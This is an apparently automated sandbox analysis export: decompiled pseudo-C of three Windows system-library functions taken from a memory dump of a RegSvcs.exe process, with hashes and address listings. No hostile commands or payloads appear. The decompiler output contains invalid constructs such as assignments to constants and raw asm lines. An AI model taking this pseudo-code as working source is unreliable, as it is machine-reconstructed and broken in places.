Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 04757f948cd6402b49da60c6057b45e69b3a315f29e884a267a02c8b2539e0ad
Instruction ID: f0fc02bd57883f233c8066c0a899a91d26797f66fda3602ad40c3a720552a86b
Opcode Fuzzy Hash: 04757f948cd6402b49da60c6057b45e69b3a315f29e884a267a02c8b2539e0ad
Instruction Fuzzy Hash: A0E1D131A0535ACFEB25CF58C980BA9B7B6BF85304F0542D9DA0ED72D1D734AA81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018F513A Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E018F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x19bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0190D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E018E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L018E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0190F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E018DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x19bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0190B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x018f5142
0x018f514c
0x018f5150
0x018f5157
0x018f5159
0x018f515e
0x018f5165
0x018f5169
0x018f516c
0x018f5172
0x018f5176
0x018f517a
0x018f517a
0x018f517a
0x018f517f
0x01936d8b
0x01936d8e
0x01936d91
0x01936d95
0x01936d98
0x01936d9c
0x01936da0
0x01936da3
0x01936da7
0x01936e26
0x01936e26
0x01936e2a
0x018f51f9
0x018f51f9
0x018f51fe
0x01936e33
0x01936e33
0x01936e39
0x01936e3d
0x01936e46
0x01936e50
0x00000000
0x00000000
0x01936e52
0x01936e53
0x01936e56
0x01936e5d
0x00000000
0x00000000
0x00000000
0x01936e5f
0x01936e67
0x01936e77
0x01936e7f
0x01936e80
0x01936e88
0x01936e90
0x01936e9f
0x01936ea5
0x01936ea9
0x01936eb1
0x01936ebf
0x00000000
0x00000000
0x01936ecf
0x01936ed3
0x00000000
0x00000000
0x01936edb
0x01936ede
0x01936ee1
0x01936ee8
0x01936eeb
0x01936eed
0x01936ef0
0x01936ef4
0x01936ef8
0x01936efc
0x00000000
0x00000000
0x01936f0d
0x01936f11
0x01936f32
0x01936f37
0x01936f3b
0x01936f3e
0x01936f41
0x01936f46
0x00000000
0x00000000
0x01936f4c
0x01936f50
0x01936f50
0x01936f54
0x01936f62
0x01936f65
0x01936f6d
0x01936f7b
0x01936f7b
0x01936f93
0x01936f98
0x01936fa0
0x01936fa6
0x01936fb3
0x01936fb6
0x01936fbf
0x01936fc1
0x01936fd5
0x01936fda
0x01936fda
0x01936fdd
0x01936fe2
0x01936fe7
0x01936feb
0x01936fef
0x01936ff3
0x018f520c
0x018f520c
0x018f520f
0x018f5215
0x018f5234
0x018f523a
0x018f523a
0x018f5244
0x018f5245
0x018f5246
0x018f5251
0x018f5251
0x01936f13
0x01936f17
0x01936f17
0x01936f18
0x01936f1b
0x01936f1f
0x01936f23
0x00000000
0x01936f28
0x018f5204
0x018f5204
0x018f5208
0x00000000
0x018f5208
0x018f5185
0x018f5188
0x018f518a
0x018f518e
0x018f5195
0x01936db1
0x01936db5
0x01936db9
0x018f519b
0x018f519b
0x018f519e
0x018f51a7
0x018f51a9
0x018f51a9
0x018f51b5
0x018f51b8
0x018f51bb
0x018f51be
0x018f51c1
0x018f51c5
0x018f51c9
0x018f51cd
0x018f51cd
0x018f51d8
0x018f51dc
0x018f51e0
0x01936dcc
0x01936dd0
0x01936dd5
0x01936ddd
0x01936de1
0x01936de1
0x01936de5
0x01936deb
0x01936df1
0x01936df7
0x01936dfd
0x01936e01
0x01936e05
0x01936e09
0x01936e0d
0x01936e11
0x01936e11
0x018f51eb
0x01936e1a
0x01936e1f
0x01936e21
0x01936e23
0x00000000
0x018f51f1
0x018f51f1
0x00000000
0x018f51f1

APIs

RtlDebugPrintTimes.NTDLL ref: 018F5234

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 755bd17d8a9e16f7c04041b7f1cabc6fb3e4f5ba5ea0d71ae65bacf836badfe1
Instruction ID: ff070b562c4a61b246e65524872e7bb25b1e83b869e88870d04d856a04693226
Opcode Fuzzy Hash: 755bd17d8a9e16f7c04041b7f1cabc6fb3e4f5ba5ea0d71ae65bacf836badfe1
Instruction Fuzzy Hash: ECC132755083819FD365CF28C580A5AFBF1BF88304F184A6EF9998B352D770EA85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018F03E2 Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E018F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x19bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E018F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0190B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E018DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x19b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E018E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E018E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01947016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01909830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E019469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x19b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0194A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x19b7bd8;
						if( *0x19b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E019095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E019099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01943540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E018CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0190AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x19b8474 - 3;
										if( *0x19b8474 != 3) {
											 *0x19b79dc =  *0x19b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E018E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E018E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01947016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x19b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x19b7b00; // 0x0
							asm("ror esi, cl");
							 *0x19bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E019095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E018D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x018f03f1
0x018f03f7
0x018f03f9
0x018f03fb
0x018f03fd
0x018f0400
0x018f040a
0x01934c7a
0x018f0537
0x018f0547
0x018f0410
0x018f0410
0x018f0414
0x018f0417
0x018f041a
0x018f0421
0x018f0424
0x018f042b
0x018f043b
0x018f043e
0x018f043f
0x018f043f
0x018f0446
0x018f0449
0x018f044c
0x018f044f
0x018f0459
0x01934c8d
0x018f045f
0x018f045f
0x018f045f
0x018f0467
0x01934c97
0x01934c9d
0x01934ca4
0x01934caa
0x01934caf
0x01934cb1
0x01934cc3
0x01934cb3
0x01934cbc
0x01934cbc
0x01934cc8
0x01934ccb
0x01934cd7
0x01934cda
0x01934cdf
0x01934cdf
0x01934ccb
0x01934ca4
0x018f046d
0x018f046f
0x018f046f
0x018f0471
0x018f0476
0x018f047a
0x018f047b
0x018f0483
0x018f0489
0x018f048d
0x00000000
0x00000000
0x01934ce9
0x01934cef
0x01934d22
0x01934d22
0x00000000
0x01934d22
0x01934cf1
0x01934cf7
0x00000000
0x00000000
0x01934cf9
0x01934cff
0x00000000
0x00000000
0x01934d05
0x01934d07
0x00000000
0x00000000
0x01934d0d
0x01934d0f
0x01934d14
0x01934d16
0x00000000
0x00000000
0x01934d1c
0x01934d1c
0x018f0499
0x018f0535
0x018f0535
0x00000000
0x018f0535
0x018f04a6
0x01934d2c
0x01934d37
0x01934d39
0x01934d3b
0x00000000
0x00000000
0x01934d41
0x01934d48
0x018f0527
0x018f052b
0x018f052d
0x018f0530
0x018f0530
0x00000000
0x018f052b
0x01934d4e
0x018f04ac
0x018f04ac
0x018f04af
0x018f04b2
0x018f04b7
0x018f04b9
0x018f04bb
0x018f04bd
0x018f04bf
0x018f04c5
0x018f04c9
0x01934d53
0x01934d59
0x01934db9
0x01934dba
0x01934dbf
0x01934dc2
0x01934dc4
0x01934dc7
0x01934dce
0x00000000
0x01934dce
0x01934d5b
0x01934d61
0x00000000
0x00000000
0x01934d63
0x01934d69
0x00000000
0x00000000
0x01934d6b
0x01934d6e
0x01934d74
0x01934d76
0x01934d7c
0x01934d7e
0x01934d84
0x01934d89
0x01934d8c
0x01934d8d
0x01934d92
0x01934d95
0x01934d96
0x01934d98
0x01934d9a
0x01934d9f
0x01934da4
0x01934da6
0x01934da8
0x01934daf
0x01934db1
0x01934db1
0x01934daf
0x01934da6
0x01934d84
0x01934d7c
0x00000000
0x01934d74
0x018f04d6
0x01934de1
0x018f04dc
0x018f04dc
0x018f04dc
0x018f04e4
0x01934deb
0x01934df1
0x01934df8
0x01934dfe
0x01934e03
0x01934e05
0x01934e17
0x01934e07
0x01934e10
0x01934e10
0x01934e1c
0x01934e1f
0x01934e35
0x01934e35
0x01934e1f
0x01934df8
0x018f04f1
0x018f04fa
0x01934e3f
0x01934e47
0x01934e5b
0x01934e61
0x01934e67
0x01934e69
0x01934e71
0x01934e73
0x018f0500
0x018f0500
0x018f0500
0x018f04fa
0x018f0508
0x018f051d
0x018f051d
0x018f051f
0x018f0524
0x00000000
0x018f0524
0x018f0515
0x018f0517
0x01934e7a
0x01934e7c
0x00000000
0x00000000
0x01934e85
0x00000000
0x01934e85
0x00000000
0x018f0517

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224985f0f94841c6535d67d07986a8d04ae9ee507b616a3df9b754e01ef8c426
Instruction ID: 9d801c569f7ae1c632982b99d17bd08028bb458930e895ca775032e838e2111c
Opcode Fuzzy Hash: 224985f0f94841c6535d67d07986a8d04ae9ee507b616a3df9b754e01ef8c426
Instruction Fuzzy Hash: 0D915C31E002199FEB319B6CC888BAD7BE5EB85718F060265FA15EB2D2D7749E40C791

Uniqueness

Uniqueness Score: -1.00%

Function 018EB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E018EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x19bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E018E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01998CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01909E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0190B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0190CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E018E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01998F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0190AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x19b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x19b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x19b8628; // 0x0
							_t116 =  *0x19b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x018eb94c
0x018eb956
0x018eb95c
0x018eb95e
0x018eb964
0x018eb969
0x018eb96d
0x018eb96d
0x018eb970
0x018eb974
0x018eb97a
0x018ebadf
0x018ebadf
0x018ebae2
0x018ebae4
0x018ebae6
0x018ebaf0
0x01932cb8
0x018ebaf6
0x018ebaf6
0x018ebaf6
0x018ebafd
0x018ebb1f
0x018ebb1f
0x018ebaff
0x018ebb00
0x018ebb00
0x018ebb03
0x018ebb03
0x018ebacb
0x018ebacf
0x018ebad0
0x018ebad1
0x018ebadc
0x018ebadc
0x018eb980
0x018eb980
0x018eb988
0x018eb98b
0x018eb98d
0x018eb990
0x018eb993
0x018eb999
0x018eb99b
0x018eb9a1
0x018eb9a5
0x018eb9aa
0x018eb9b0
0x018eb9bb
0x018eb9c0
0x018eb9c3
0x018eb9ca
0x018eb9cc
0x018eb9cf
0x018eb9d3
0x018eb9d7
0x018eba94
0x018eba94
0x018eba98
0x018ebaa3
0x01932ccb
0x018ebaa9
0x018ebaa9
0x018ebaa9
0x018ebab1
0x01932cd5
0x01932cdd
0x01932cdd
0x018ebabb
0x018ebabc
0x018ebac2
0x018ebac3
0x018ebac3
0x018ebac6
0x00000000
0x018eb9dd
0x018eb9dd
0x018eb9e7
0x018eb9e7
0x018eb9ec
0x018eb9ec
0x018eb9f1
0x018eb9f5
0x018eb9fa
0x018eba00
0x018eba0c
0x018eba10
0x018eba10
0x018eba12
0x018eba18
0x00000000
0x00000000
0x018ebb26
0x018ebb26
0x018eba1e
0x018eba1e
0x018eba23
0x018eba25
0x018eba2c
0x018eba30
0x018eba35
0x018eba35
0x018eba41
0x018eba46
0x018eba4c
0x018eba50
0x018eba54
0x018eba6a
0x018eba6e
0x018eba70
0x018eba74
0x018eba78
0x018eba7a
0x018eba7c
0x018eba8e
0x018eba90
0x018eba92
0x018ebb14
0x018ebb14
0x018ebb16
0x018ebb16
0x00000000
0x018eba7c
0x018ebb0a
0x018ebb0d
0x00000000
0x00000000
0x00000000
0x018ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018EB9A5

Memory Dump Source

